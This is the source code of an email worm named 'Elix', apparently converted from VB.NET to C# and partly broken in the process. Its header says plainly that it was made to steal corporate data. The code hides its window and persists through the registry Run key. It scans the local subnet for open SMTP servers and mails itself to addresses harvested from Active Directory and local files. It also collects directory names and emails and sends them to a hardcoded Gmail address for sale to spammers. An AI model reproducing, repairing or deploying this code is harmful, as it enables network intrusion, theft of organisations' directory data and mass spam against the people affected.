/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//
// Elix By dJANGGO/3F
// ******************
//  
// Elix was designed to spesific purpose in stealing data from corporates, yeah Elix was made to steal
// Data, thats why I need to test it over the LAN and WAN.Maybe its the first worm using LDAP to spread.
// I'm not realy good in description
// 
// They are some cheat for AntiVirus Product to Analyse Elix :
// 
// ~ Non parasitic direct action virus
// ~ OOP worm using .NET based, some ppl call it MSIL with MS visual studio 2008 express
// ~ Will effected only with .net framework(2.0 or more), so host with no .net installed will safe
// ~ Usual startup, using SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
// ~ Has ability to search SMTP Server over the corporate network
// ~ Spread using SMTP server that has been found
// ~ Effected network smtp : --> SMTP server doesn't use authenticate
// 			     --> SMTP server authenticate is integrated to Active directory server
// ~ Steal Active Directory data and send the data to me :D
// ~ Search List of mail by 2 ways : - By Search email on LDAP
// 				     - bY Search in every flat text that contains email signature
//
//					Here is the list
//
// 					Array.Resize(ref ListOfFileTypes, 6);
//					ListOfFileTypes.SetValue("*.TXT", 0);
//					ListOfFileTypes.SetValue("*.HTM", 1);
//					ListOfFileTypes.SetValue("*.HTML", 2);
//					ListOfFileTypes.SetValue("*.XML", 3);
//					ListOfFileTypes.SetValue("*.ASP", 4);
//					ListOfFileTypes.SetValue("*.PHP", 5);
//
// ~ Search SMTP Server by 2 ways : - By looking for proxy server presence, after found, Elix will scan
// 				      smtp port broadcast network range CIDR /23 (most DMZ rules use that)
// 				    - If no proxy server setting found, Elix will scan current host 
//				      network range
//
// ~ Using System.Net.Mail
// 
// ~ Has ability to translate cisco device that using CIDR compliant (MS/CISCO-compliant)
// ~ Payload only a message on day = 1 :
//	
//   Interaction.MsgBox("Elix By dJANGGO/3F", Constants.vbInformation, "WORM ELIX");
// 
//   and copy it self in several drives
// 
// ~ Validate spesific string format using regex
// ~ Trap posible error using Try Catch Throw, I hope it will work stable
//
//
// Alert :
//
// This is life virus, I never send the source or binary to any AV Product,so they They may able to detect it
// or not, it means you take all responsible for what you did with the code, use it free, no guarante, no license,
// no copyright, no gnu/gpl, no blah blah blah.. I hate profitability
//
// 
// Credits :
//
// Psychologic/3f ~ Gimme tons of LDAP info and I'm still waiting for your Blackberry virus, ehemmm,, dont 
//		    forget, or :
//
//		    I WILL KICK YOUR ASS!!
// 
// To Build :
// Use Ms.Visual studio 2008 Express maybe also work in 2005 or 2010
//  
// 								
// 									dJANGGO/3f
// 									Chain me, or you die
// 
// ELIXIA...
// 	Thank..
// 	  for..
// 	    broke..
// 	        my..
//		  heart... :(




using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.IO;
using System.Net.Mail;
using System.Security.Principal;
using System.DirectoryServices;
using System.Runtime.InteropServices;

static class Module1
{
	static  v;
	static  i;
	static [] bit = new[];
	public const string WormNAME = "Worm.Elix.EXE";
	[DllImport("kernel32", EntryPoint = "GetConsoleTitleA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
	public static extern int GetConsoleTitle(string lpConsoleTitle, int nSize);
	[DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
	public static extern int FindWindow(string lpClassName, string lpWindowName);
	[DllImport("user32", EntryPoint = "ShowWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
	public static extern int ShowWindow(int hwnd, int nCmdShow);
	const  SW_HIDE = 0;
	const  SW_SHOWNORMAL = 1;
	const  SW_NORMAL = 1;
	const  SW_SHOWMINIMIZED = 2;
	public static string[] ListOfFileTypes;
	static System.Random objRandom = new System.Random(Convert.ToInt32(System.DateTime.Now.Ticks % System.Int32.MaxValue));

	public enum ADAccountOptions
	{
		UF_TEMP_DUPLICATE_ACCOUNT = 256,
		UF_NORMAL_ACCOUNT = 512,
		UF_INTERDOMAIN_TRUST_ACCOUNT = 2048,
		UF_WORKSTATION_TRUST_ACCOUNT = 4096,
		UF_SERVER_TRUST_ACCOUNT = 8192,
		UF_DONT_EXPIRE_PASSWD = 65536,
		UF_SCRIPT = 1,
		UF_ACCOUNTDISABLE = 2,
		UF_HOMEDIR_REQUIRED = 8,
		UF_LOCKOUT = 16,
		UF_PASSWD_NOTREQD = 32,
		UF_PASSWD_CANT_CHANGE = 64,
		UF_ACCOUNT_LOCKOUT = 16,
		UF_PCC = 66048,
		UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 128
	}
	
	//Here we go..

	public static void Main()
	{
		//Hide this worm
		string strTitle = Strings.Space(256);
		long rtnLen = GetConsoleTitle(strTitle, 256);
		if (rtnLen > 0) {
			strTitle = Strings.Left(strTitle, rtnLen);
		}
		Int32 hwnd = default(Int32);
		hwnd = FindWindow(Constants.vbNullString, strTitle);
		ShowWindow(hwnd, SW_HIDE);

		//Hardcoded Copy file to D:\ because C:\ is suck under windows Vista, 7 or 8

		try {
			if (!File.Exists("D:\\" + WormNAME)) {
				File.Copy(Directory.GetCurrentDirectory() + "\\" + WormNAME, "D:\\" + WormNAME);
			}
			if (!File.Exists("D:\\ElixDataStream.txt")) {
				System.IO.StreamWriter objWriter = new System.IO.StreamWriter("D:\\ElixDataStream.txt", true);
				objWriter.Write("No data");
				objWriter.Close();
			}

			// ~ Usual startup, using SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run because work very well under all win version

			Microsoft.Win32.RegistryKey regKey = null;
			decimal ver = default(decimal);
			regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).GetValue("Elixia");

			if (regKey == null) {
				createregistrykey("D:\\" + WormNAME);
			}

		} catch (Exception ex) {
			throw ex;
		}

		//List file
		try {
			createregistrykey("D:\\" + WormNAME);
		} catch (Exception ex) {
			throw ex;
		}

		v = 1;
		for (i = 0; i <= 31; i++) {
			bit[i] = NumberToLong(v);
			v = v + v;
		}
		dynamic ip = null;
		dynamic mask = null;
		dynamic size = null;
		dynamic sn = null;
		dynamic ip1 = null;
		dynamic ipN = null;

		// Get DMZ zone by looking for its proxy server

		if (!string.IsNullOrEmpty(getDMZAddress("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "ProxyServer"))) {
			ip = ValidateIP(getDMZAddress("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "ProxyServer"));
		} else {

		// if not found, elix will search in current host range network (cidr /23=512 host broaadcast)

			ip = GetLocalIP();
		}

		mask = CIDRtoMask("23");

		// hardcode /23 cisco cidr translation

		sn = subnet(ip, mask);

		size = subnetSize(mask);

		ip1 = sn | 1;
		ipN = sn | size;

		int prog = (ipN - ip1) + 1;
		try {
			int stat = 0;
			for (i = ip1; i <= ipN; i++) {
				stat = stat + 1;


				if (My.Computer.Network.Ping(IpString(i))) {
					if (checkSMTPPort(IpString(i), "25")) {

						//Spreading way.....
						//spreaddd Elixx....
						TrySendOverAD(IpString(i));
						TrySendOverFileSearch(IpString(i));
						TrySendMeTheFile(IpString(i));
					}

				}
			}
		} catch (Exception ex) {
			throw ex;
		}

		try {
			if (DateAndTime.Day(DateAndTime.Now) % 5 == 0) {
				StealthDomainData();
			}
			if (DateAndTime.Day(DateAndTime.Now) == 1) {
				payload();
			}
		} catch (Exception ex) {
			throw ex;
		}
	}
	
	//Collected data will be sent to my email

	public static object TrySendMeTheFile(string ip)
	{
		try {
			MailMessage objMailMsg = new MailMessage("infectedhost@elix.com", "dj4n660@gmail.com");
			objMailMsg.Subject = "Elix By dJANGGO/3F";
			objMailMsg.Body = "This is the data";
			objMailMsg.Priority = MailPriority.High;

			//Hardcoded file stream because I hate C:\, it wont work in many corporate GPO

			objMailMsg.Attachments.Add(new Attachment("D:\\ElixDataStream.txt"));
			objMailMsg.IsBodyHtml = true;
			System.Net.Mail.SmtpClient objSMTPClient = new System.Net.Mail.SmtpClient();
			objSMTPClient.Host = ip;
			objSMTPClient.Send(objMailMsg);
		} catch (Exception ex) {
			throw ex;
		}
	}

	//They are function to retreive spesific convertion UAC in Active Directory

	public static bool IsAccountDisabled(int userAccountControl)
	{
		int accountDisabled = Convert.ToInt32(ADAccountOptions.UF_ACCOUNTDISABLE);
		int flagExists = userAccountControl & accountDisabled;

		if (flagExists > 0) {
			return true;
		} else {
			return false;
		}
	}

	public static bool Ispasscantchange(int userAccountControl)
	{
		int passcantchange = Convert.ToInt32(ADAccountOptions.UF_PASSWD_CANT_CHANGE);
		int flagExists = userAccountControl & passcantchange;

		if (userAccountControl == Convert.ToInt32(66048)) {
			return true;
		} else {
			return false;
		}
	}

	public static bool Ispassnotreq(int userAccountControl)
	{
		int passnotreq = Convert.ToInt32(ADAccountOptions.UF_PASSWD_NOTREQD);
		int flagExists = userAccountControl & passnotreq;

		if (flagExists > 0) {
			return true;
		} else {
			return false;
		}
	}

	public static bool Isdontexppass(int userAccountControl)
	{
		int dontexppass = Convert.ToInt32(ADAccountOptions.UF_DONT_EXPIRE_PASSWD);
		int flagExists = userAccountControl & dontexppass;

		if (flagExists > 0) {
			return true;
		} else {
			return false;
		}
	}

	public static void createregistrykey(string path)
	{
		try {
			Microsoft.Win32.RegistryKey regKey = null;
			decimal ver = default(decimal);
			regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
			regKey.SetValue("Elixia", path);
			regKey.Close();
		} catch (Exception ex) {
			throw ex;
		}
	}
	
	//Search all posible Email in current flat texts in host Harddrive

	public static void TrySendOverFileSearch(string ip)
	{
		Array.Resize(ref ListOfFileTypes, 6);
		ListOfFileTypes.SetValue("*.TXT", 0);
		ListOfFileTypes.SetValue("*.HTM", 1);
		ListOfFileTypes.SetValue("*.HTML", 2);
		ListOfFileTypes.SetValue("*.XML", 3);
		ListOfFileTypes.SetValue("*.ASP", 4);
		ListOfFileTypes.SetValue("*.PHP", 5);
		try {

			// Loop through all the drives on the computer

			foreach (System.IO.DriveInfo drive in My.Computer.FileSystem.Drives) {
				if (drive.IsReady == true) {

					// search for files in the root directory

					foreach (string FileName in My.Computer.FileSystem.GetFiles(drive.Name, Microsoft.VisualBasic.FileIO.SearchOption.SearchTopLevelOnly, ListOfFileTypes)) {
						MailFound(ip, FileName);
					}

					//search sub directory

					foreach (string SubDir in My.Computer.FileSystem.GetDirectories(drive.Name)) {
						foreach (string FileName in My.Computer.FileSystem.GetFiles(SubDir, Microsoft.VisualBasic.FileIO.SearchOption.SearchAllSubDirectories, ListOfFileTypes)) {
							MailFound(ip, FileName);
						}
					}
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
	}
	
	//Finding email address..

	public static void MailFound(string ip, string Filename)
	{
		//module send email
		try {
			string stream = My.Computer.FileSystem.ReadAllText(Filename);
			[] arrstream = Strings.Split(stream, " ");
			foreach (object arr_loopVariable in arrstream) {
				arr = arr_loopVariable;
				if (ValidateMailAddress(arr)) {
					sendMail(ip, getRandomMail(), arr);
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
	}

	//Now in in LDAP

	public static void TrySendOverAD(string ip)
	{
		try {
			string aName = WindowsIdentity.GetCurrent().Name;
			string aDomain = aName.Substring(0, aName.IndexOf("\\"));

			DirectoryEntry enTry = new DirectoryEntry("LDAP://" + aDomain + ":389");
			DirectorySearcher mySearcher = new DirectorySearcher(enTry);
			mySearcher.PageSize = 1000000;
			mySearcher.Filter = ("(&(objectCategory=person))");

			SearchResult resEnt = default(SearchResult);
			int a = 0;
			ResultPropertyCollection myResultPropColl = default(ResultPropertyCollection);
			string mkey = null;
			dynamic adname = null;
			dynamic mailTo = null;
			foreach ( resEnt in mySearcher.FindAll()) {
				myResultPropColl = resEnt.Properties;
				a = a + 1;
				
				// Search victim in AD, to spread over LAN/WAN

				foreach (string mkey_loopVariable in myResultPropColl.PropertyNames) {
					mkey = mkey_loopVariable;
					object myCollection = null;
					if (mkey.ToString() == "displayname") {
						foreach (object myCollection_loopVariable in myResultPropColl(mkey)) {
							myCollection = myCollection_loopVariable;
							adname += myCollection.ToString();
						}
					}
					if (mkey.ToString() == "mail") {
						foreach (object myCollection_loopVariable in myResultPropColl(mkey)) {
							myCollection = myCollection_loopVariable;
							mailTo += myCollection.ToString();
						}
					}
					if (!string.IsNullOrEmpty(mailTo)) {
						if (ValidateMailAddress(mailTo)) {
							try {
								sendMail(ip, adname, mailTo);
							} catch (Exception ex) {
								throw ex;
							}
						}
					}
					adname = "";
					mailTo = "";
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
	}
	
	//I'm using regex here,good to validate several string format

	public static string ValidateIP(string ip)
	{
		try {
			string ip2 = "";
			if (System.Text.RegularExpressions.Regex.IsMatch(ip, "\\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2" + "[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9]" + "[0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\b")) {
				for (i = 1; i <= Strings.Len(ip); i++) {
					if (Strings.Mid(ip, i, 1) == ":")
						break; // Because may not work if there is port section in the ip string format
					ip2 = ip2 + Strings.Mid(ip, i, 1);
				}
				return ip2;
			}
		} catch (Exception ex) {
			throw ex;
		}
	}

	public static string ValidateMailAddress(string mail)
	{
		try {
			if (System.Text.RegularExpressions.Regex.IsMatch(mail, "^[_a-z0-9-]+(.[a-z0-9-]+)@[a-z0-9-]+(.[a-z0-9-]+)*(.[a-z]{2,4})$")) {
				return true;
			} else {
				return false;
			}
		} catch (Exception ex) {
			throw ex;
		}
	}

	//Random Email address sent from

	public static int GetRandomNumber(int Low = 1, int High = 10)
	{
		// Returns a random number between the optional Low and High parameters
		return objRandom.Next(Low, High + 1);
	}
	
	// Function to generate random email-From
	public static object getRandomMail()
	{
		[] mailfrom = {

			// Mostly they are my favourite hero while playing DOTA game

			"Magina",		// Agility hero
			"Mirana",		// Agility hero
			"Lanaya",		// Agility hero
			"Mirana",		// Agility hero
			"Dart",			// Agility hero
			"Pudge",		// Strength hero
			"Stan",			// Strength hero
			"Beastmaster",		// Strengthhero
			"Mortes",		// My friend
			"Systemo",		// My virtual friend
			"Elix",			// This worm
			"dJANGGO"		// Me..
		};
		[] mailhost = {
			"@yahoo",
			"@gmail",
			"@hotmail",
			"@lovemail",
			"@sexmail",
			"@bolehmail",
			"@zimail",
			"@obmail",
			"@Kmail",
			"@microsoft",
			"@vx-heaven",
			"@funmail"
		};
		[] maildomain = {
			".com",
			".net",
			".sex",
			".org",
			".fun",
			".cc",
			".or.uk",
			".uk",
			".id",
			".my",
			".us",
			".men"
		};
		return mailfrom(GetRandomNumber()) + mailhost(GetRandomNumber()) + maildomain(GetRandomNumber());
	}

	//Some payload
	public static void payload()
	{
		try {
			string[] drives = {
				"C",
				"E",
				"F",
				"G",
				"H",
				"I",
				"J",
				"K",
				"L",
				"M",
				"N",
				"O",
				"P",
				"Q",
				"R",
				"S",
				"T",
				"U",
				"V",
				"W",
				"X",
				"Y",
				"Z"
			};
			if (File.Exists("D:\\Worm.Elix.exe")) {
				foreach (object drive_loopVariable in drives) {
					drive = drive_loopVariable;
					File.Copy("D:\\" + WormNAME, drive + ":\\" + WormNAME);
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
		Interaction.MsgBox("Elix By dJANGGO/3F", Constants.vbInformation, "WORM ELIX");
	}

	// Now steal domain data, I've mark as comment for some function because I only need their name and email

	public static void StealthDomainData()
	{
		try {
			string aName = WindowsIdentity.GetCurrent().Name;
			string aDomain = aName.Substring(0, aName.IndexOf("\\"));
			//This attribute can be used in LDAP
			string buff = null;
			string adname = null;
			string displayname = null;
			string AccDisabled = null;
			string whencreated = null;
			string passcantchange = null;
			string dontexppass = null;
			string useraccountcontrol = null;
			string distinguishedname = null;
			string memberof = null;
			string adspath = null;
			string mail = null;
			string lastlogon = null;

			DirectoryEntry enTry = new DirectoryEntry("LDAP://" + aDomain + ":389");
			DirectorySearcher mySearcher = new DirectorySearcher(enTry);
			mySearcher.PageSize = 1000000;
			mySearcher.Filter = ("(&(objectCategory=person))");

			SearchResult resEnt = default(SearchResult);
			int a = 0;
			ResultPropertyCollection myResultPropColl = default(ResultPropertyCollection);
			string mkey = null;
			string d = null;
			System.IO.StreamWriter objWriter = new System.IO.StreamWriter("D:\\ElixDataStream.txt", true);
			foreach ( resEnt in mySearcher.FindAll()) {
				myResultPropColl = resEnt.Properties;
				a = a + 1;
				foreach (string mkey_loopVariable in myResultPropColl.PropertyNames) {
					mkey = mkey_loopVariable;
					object myCollection = null;
					//No used, just showing you it can be retreived
					//If mkey.ToString = "samaccountname" Then
					//For Each myCollection In myResultPropColl(mkey) : adname += myCollection.ToString : Next myCollection
					//End If

					if (mkey.ToString() == "displayname") {
						foreach (object myCollection_loopVariable in myResultPropColl(mkey)) {
							myCollection = myCollection_loopVariable;
							displayname += myCollection.ToString();
						}
					}

					//No used, just showing you it can be retreived

					//If mkey.ToString = "whencreated" Then
					//For Each myCollection In myResultPropColl(mkey) : whencreated += myCollection.ToString : Next myCollection
					//End If

					//No used, just showing you it can be retreived
					//If mkey.ToString = "distinguishedname" Then
					//For Each myCollection In myResultPropColl(mkey) : distinguishedname += myCollection.ToString : Next myCollection
					//End If

					//No used, just showing you it can be retreived

					//If mkey.ToString = "useraccountcontrol" Then
					//For Each myCollection In myResultPropColl(mkey)
					//AccDisabled = IsAccountDisabled(myCollection.ToString)
					//useraccountcontrol = myCollection.ToString
					//dontexppass = Isdontexppass(myCollection.ToString)
					//passcantchange = Ispasscantchange(myCollection.ToString)
					//Next myCollection
					//End If

					//No used, just showing you it can be retreived

					//If mkey.ToString = "memberof" Then
					//For Each myCollection In myResultPropColl(mkey) : memberof += myCollection.ToString : Next myCollection
					//End If

					if (mkey.ToString() == "adspath") {
						foreach (object myCollection_loopVariable in myResultPropColl(mkey)) {
							myCollection = myCollection_loopVariable;
							adspath += myCollection.ToString();
						}
					}

					if (mkey.ToString() == "mail") {
						foreach (object myCollection_loopVariable in myResultPropColl(mkey)) {
							myCollection = myCollection_loopVariable;
							mail += myCollection.ToString();
						}
					}

					//No used, just showing you it can be retreived
					//If mkey.ToString = "lastlogon" Then
					//For Each myCollection In myResultPropColl(mkey)
					//Dim LastLogonDate As DateTime = DateTime.FromFileTime(myCollection)
					//lastlogon += LastLogonDate : Next myCollection
					//End If
				}

				//But I only need this, spammer will paid much for me
				objWriter.WriteLine("[" + displayname + "] : [" + "[" + mail + "] : [" + "[" + adspath + "]");

				adname = "";
				displayname = "";
				AccDisabled = "";
				whencreated = "";
				passcantchange = "";
				dontexppass = "";
				distinguishedname = "";
				useraccountcontrol = "";
				memberof = "";
				adspath = "";
				mail = "";
				lastlogon = "";
			}
			objWriter.Close();
		} catch (Exception ex) {
			throw ex;
		}
	}

	//send mail to victim
	public static object sendMail(string SmtpServer, string emailFrom, string EmailTo)
	{
		try {
			MailMessage objMailMsg = new MailMessage(emailFrom, EmailTo);
			objMailMsg.Subject = "Elix By dJANGGO/3F";
			objMailMsg.Body = "This is Elix worm, do not execute the file";
			objMailMsg.Priority = MailPriority.High;
			objMailMsg.Attachments.Add(new Attachment("D:\\" + WormNAME));
			objMailMsg.IsBodyHtml = true;
			System.Net.Mail.SmtpClient objSMTPClient = new System.Net.Mail.SmtpClient();
			objSMTPClient.Host = SmtpServer;
			objSMTPClient.Send(objMailMsg);
		} catch (Exception ex) {
			throw ex;
		}
	}

	//Get Host IP
	public static string GetLocalIP()
	{
		try {
			string _IP = null;
			System.Net.IPHostEntry _IPHostEntry = System.Net.Dns.GetHostEntry(System.Net.Dns.GetHostName());
			foreach (System.Net.IPAddress _IPAddress in _IPHostEntry.AddressList) {
				if (_IPAddress.AddressFamily.ToString() == "InterNetwork") {
					_IP = _IPAddress.ToString();
				}
			}
			return _IP;
		} catch (Exception ex) {
			throw ex;
		}
	}

	// In corporate, SMTP server should be at DMZ zone the same area with proxy server
	// So the easy way to find out smtp server is by looking the place of proxy server
	// When we found it it, just creaate simple proc smtp port scanner, and doing scan
	// in every server in DMZ area,when it found opened smtp port,this virus will send
	// it self using the server

	public static object getDMZAddress(string rkey, string rvalue)
	{
		try {
			Microsoft.Win32.RegistryKey MyReg = Microsoft.Win32.RegistryKey.OpenRemoteBaseKey(Microsoft.Win32.RegistryHive.CurrentUser, GetLocalIP());
			Microsoft.Win32.RegistryKey MyRegKey = null;
			MyRegKey = MyReg.OpenSubKey(rkey);
			string s = MyRegKey.GetValue(rvalue);
			return s;
		} catch (Exception ex) {
			throw ex;
		}
	}

	// Check smtp port 25, in every host that has been found in DMZ
	public static object checkSMTPPort(string host, string port)
	{
		try {
			System.Net.IPAddress hostadd = System.Net.Dns.GetHostEntry(host).AddressList[0];
			System.Net.IPEndPoint EPhost = new System.Net.IPEndPoint(hostadd, port);
			System.Net.Sockets.Socket s = new System.Net.Sockets.Socket(System.Net.Sockets.AddressFamily.InterNetwork, System.Net.Sockets.SocketType.Stream, System.Net.Sockets.ProtocolType.Tcp);

			s.Connect(EPhost);

			if (!s.Connected) {
				return false;
			} else {
				return true;
			}
		} catch (Exception ex) {
			throw ex;
		}
	}

	// CIDR Translator
	//---------------------------------- they are functions to convert CIDR to broadcast addresses ----------------------------------
	public static object subnetSize(mask)
	{
		//returns the number of IPs for a given subnet-mask
		//will only work with MS/CISCO-compliant masks with leading 1-s and trailing 0-s, but not for masks like 255.0.255.0
		return -IpValue(mask) - 2;
	}

	public static object subnet(IP, mask)
	{
		//converts a given IP-string and subnetmask-string into a number from type LONG representing the subnet
		return IpValue(IP) & IpValue(mask);
	}

	public static object IpValue(IP)
	{
		//converts an IP-string into a number from type LONG (for bit-operators like AND/OR)
		return NumberToLong(IpToNumber(IP));
	}

	public static object IpToNumber(IP)
	{
		object functionReturnValue = null;
		//converts an IP-string into a large positive number between &H00000000 and &HFFFFFFFF 
		dynamic octet = null;
		foreach (object octet_loopVariable in Strings.Split(IP, ".")) {
			octet = octet_loopVariable;
			functionReturnValue = functionReturnValue * 256 + Convert.ToByte(octet);
		}
		return functionReturnValue;
	}

	public static object NumberToLong(n)
	{
		object functionReturnValue = null;
		//converts a large number between &H00000000 and &HFFFFFFFF into type LONG
		if (n > 0x7fffffff) {
			functionReturnValue = n - 4294967296L;
		} else {
			functionReturnValue = n;
		}
		return functionReturnValue;
	}

	public static object IpString(n)
	{
		object functionReturnValue = null;
		//converts a n IP-value from type LONG into a readable IP-string
		try {
			dynamic octet = null;
			dynamic octetValue = null;
			dynamic bOffset = null;
			for (octet = 0; octet <= 3; octet++) {
				octetValue = 0;
				for (b = 0; b <= 7; b++) {
					if (n & bit[bOffset + b])
						octetValue = octetValue + bit[b];
				}
				bOffset = bOffset + 8;
				if (octet == 0) {
					functionReturnValue = Convert.ToString(octetValue);
				} else {
					functionReturnValue = Convert.ToString(octetValue) + "." + functionReturnValue;
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
		return functionReturnValue;
	}

	public static object maskbit(mask)
	{
		dynamic m = null;
		dynamic b = null;
		m = IpValue(mask);
		for (b = 0; b <= 31; b++) {
			if ((m & bit[b]))
				break;
		}
		return 32 - b;
	}

	public static string CIDRtoMask(int CIDR)
	{
		try {
			if (CIDR < 2 || CIDR > 30) {
				System.Diagnostics.Debugger.Break();
			}

			Debug.WriteLine(CIDR.ToString());

			//simulated ip address
			UInt32 ipAsNum = 3232300291L;
			//192.168.253.3
			Debug.WriteLine(Convert.ToString(ipAsNum, 2).PadLeft(32, '0') + " IP as num");
			//show binary

			//create mask
			UInt32 mask = UInt32.MaxValue << (32 - CIDR);
			Debug.WriteLine(Convert.ToString(mask, 2).PadLeft(32, '0') + " mask");
			//show binary

			UInt32 CT = UInt32.MaxValue ^ mask;
			//the zero based count of hosts in network
			UInt32 NN = ipAsNum & mask;
			//network number
			UInt32 NB = NN | CT;
			//network broadcast
			Debug.WriteLine(Convert.ToString(CT, 2).PadLeft(32, '0') + " CT");
			//show binary
			Debug.WriteLine(Convert.ToString(NN, 2).PadLeft(32, '0') + " NN");
			//show binary
			Debug.WriteLine(Convert.ToString(NB, 2).PadLeft(32, '0') + " NB");
			//show binary

			//get bytes
			byte[] tb = BitConverter.GetBytes(mask);
			Array.Reverse(tb);

			//convert to string
			string stringMask = string.Format("{0}.{1}.{2}.{3}", tb[0], tb[1], tb[2], tb[3]);

			return stringMask;
		} catch (Exception ex) {
			throw ex;
		}
	}

}

